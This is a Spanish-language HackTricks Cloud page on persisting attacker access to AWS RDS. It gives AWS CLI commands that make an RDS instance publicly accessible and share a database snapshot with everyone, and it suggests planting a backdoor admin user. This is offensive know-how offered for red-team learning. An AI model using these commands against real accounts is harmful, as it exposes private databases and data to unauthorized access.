Español - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - RDS Persistence

Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

RDS

Para más información consulta:

pageAWS - Relational Database (RDS) Enum

Hacer que la instancia sea accesible públicamente: rds:ModifyDBInstance

Un atacante con este permiso puede modificar una instancia de RDS existente para habilitar la accesibilidad pública.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Crear un usuario administrador dentro de la base de datos

Un atacante podría simplemente crear un usuario dentro de la base de datos para que incluso si se modifica la contraseña del usuario maestro, no pierda el acceso a la base de datos.

Hacer pública la instantánea

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

AnteriorAWS - Lightsail PersistenceSiguienteAWS - S3 Persistence

Última actualización